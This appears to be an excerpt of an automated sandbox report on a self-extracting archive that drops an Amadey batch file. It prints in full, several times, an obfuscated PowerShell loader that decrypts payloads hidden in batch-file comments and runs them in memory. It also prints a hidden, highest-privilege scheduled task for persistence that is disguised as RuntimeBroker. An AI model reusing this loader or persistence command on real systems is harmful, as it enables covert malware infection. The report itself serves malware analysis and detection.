Source: jcgLYlM4dg.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: jcgLYlM4dg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: jcgLYlM4dg.exe
Source: jcgLYlM4dg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: jcgLYlM4dg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: jcgLYlM4dg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: jcgLYlM4dg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: jcgLYlM4dg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6893593
Source: jcgLYlM4dg.exe Static PE information: section name: .didat
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A407F0 push ecx; ret 0_2_00A40803
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A3FEFC push eax; ret 0_2_00A3FF1A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07493826 push dword ptr [eax+eax*2-75h]; iretd 5_2_0749382C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04DC0DA8 push esi; retf 11_2_04DC0DB2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04DC11A3 push esp; retf 11_2_04DC11B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_07B53570 push eax; retf 11_2_07B53589

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
